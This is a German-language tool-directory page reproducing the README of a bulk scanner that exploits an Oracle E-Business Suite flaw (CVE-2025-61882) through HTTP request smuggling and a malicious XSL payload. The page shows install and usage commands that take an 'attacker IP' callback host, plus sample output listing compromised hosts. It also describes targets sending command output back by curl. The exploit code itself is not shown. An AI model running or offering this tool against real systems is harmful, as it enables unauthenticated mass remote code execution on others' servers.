Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-61882 — Mehrthread-Scanner für CVE-2025-61882 in Oracle E-Business Suite, der HTTP-Request-Smuggling ausnutzt, um eine nicht authentifizierte Remote-Codeausführung zu erreichen und diese über die Befehlsausgabe zu validieren. | Kitploit
Tools/GitHubGitHub/sachinart/cve-2025-61882
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Mehrthread-Scanner für CVE-2025-61882 in Oracle E-Business Suite, der HTTP-Request-Smuggling ausnutzt, um eine nicht authentifizierte Remote-Codeausführung zu erreichen und diese über die Befehlsausgabe zu validieren.

Repository anzeigen
1173vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Oracle E-Business Suite RCE-Scanner (CVE-2025-61882)

Ein schneller, multithread-fähiger Bulk-Scanner zur Erkennung von CVE-2025-61882 in Oracle E-Business Suite-Installationen. Diese kritische Schwachstelle ermöglicht nicht authentifizierte Remote-Codeausführung.

Python Version License CVE

🎯 Funktionen

  • Bulk-Scanning - Verarbeitung von Hunderten oder Tausenden von Zielen aus einer Datei
  • Multithreading - Konfigurierbares gleichzeitiges Scannen (Standard: 20 Threads)
  • Automatische Erkennung - Validiert RCE durch Ausführen des id-Befehls und Parsen der Ausgabe
  • Echtzeit-Ergebnisse - Verwundbare Ziele werden sofort in vuln-output.txt geschrieben
  • Zufällige Ports - Verwendet zufällige Ports (2000-9999) für jedes Ziel, um Konflikte zu vermeiden
  • Saubere Ausgabe - Fortschrittsverfolgung mit minimalem Rauschen

📋 Anforderungen

root@kitploit:~
pip install requests

Das ist alles. Nur Python 3.7+ und die requests-Bibliothek.

🚀 Installation

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Verwendung

Basis-Scan

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

Schneller Scan (50 Threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

Konservativer Scan (10 Threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 Format der Zieldatei

Erstellen Sie eine targets.txt-Datei mit einer URL pro Zeile:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Beispiel für die Ausgabe

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE-Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] 1235 Ziele aus Datei geladen
[*] Läuft mit 20 gleichzeitigen Threads
[*] Verwundbare Hosts werden in vuln-output.txt gespeichert

[*] [1/1235] Prüfe https://target1.com:443 auf Port 7893
[*] [2/1235] Prüfe https://target2.com:443 auf Port 5882

[+] Treffer! 129.146.56.43 ist verwundbar
[+] Befehlsausgabe: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan in 245.67 Sekunden abgeschlossen
[*] 3 verwundbare Ziele gefunden
[*] Vollständige Ergebnisse in vuln-output.txt ansehen
=================================================================

[+] Verwundbare Ziele gefunden:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 Ausgabedatei

Die Ergebnisse werden in vuln-output.txt gespeichert:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan-Ergebnisse
# Gestartet: Di Okt 07 15:30:45 2025
# Gesamtzahl der Ziele: 1235
# Scanner von: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 So funktioniert es

  1. CSRF-Token-Abruf - Holt ein gültiges CSRF-Token vom Ziel
  2. HTTP-Request-Smuggling - Nutzt die Smuggling-Schwachstelle aus, um eine bösartige Payload einzuschleusen
  3. XSL-Payload-Zustellung - Liefert ein bösartiges XSL-Stylesheet, das Befehle ausführt
  4. Callback-Validierung - Das Ziel führt den id-Befehl aus und sendet die Ausgabe per curl zurück
  5. Regex-Abgleich - Validiert erfolgreiche RCE durch Prüfung auf das uid=...gid=...-Muster

⚙️ Konfiguration

🔒 Verantwortungsvolle Offenlegung

Dieses Tool ist nur für autorisierte Sicherheitstests gedacht. Beachten Sie immer:

  • ✅ Holen Sie vor dem Testen eine schriftliche Genehmigung ein
  • ✅ Scannen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testautorisierung haben
  • ✅ Melden Sie Ergebnisse verantwortungsvoll an betroffene Organisationen
  • ✅ Befolgen Sie koordinierte Verfahren zur Offenlegung von Schwachstellen
  • ❌ Verwenden Sie dies niemals auf nicht autorisierten Systemen

Unbefugter Zugriff auf Computersysteme ist illegal.

🐛 Bekannte Probleme

  • Einige Ziele können aufgrund von Firewall-/IDS-Blockierung einen Timeout verursachen
  • Die Callback-Erkennung erfordert, dass das Ziel Ihre VPS auf zufälligen Ports erreicht
  • SSL-Zertifikatswarnungen werden unterdrückt (für Pentesting erwartet)

🤝 Mitwirken

Einen Fehler gefunden? Eine Funktionsanfrage?

  1. Forken Sie das Repo
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/amazing-feature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Add some feature')
  4. Pushen Sie den Branch (git push origin feature/amazing-feature)
  5. Öffnen Sie einen Pull Request

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details.

⚠️ Haftungsausschluss

Dieses Tool wird nur für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Nutzung auf eigenes Risiko.

📚 Referenzen

  • CVE-2025-61882 Details
  • Oracle Critical Patch Update

👨‍💻 Entwickelt von Chirag Artani

Website • Twitter • LinkedIn

Mit ❤️ für die Infosec-Community erstellt

Tool herunterladen
ArgumentErforderlichStandardBeschreibung
--targetsJa-Pfad zur Datei mit den Ziel-URLs
--lhostJa-Ihre VPS-/Angreifer-IP-Adresse
--threadsNein20Anzahl der gleichzeitigen Threads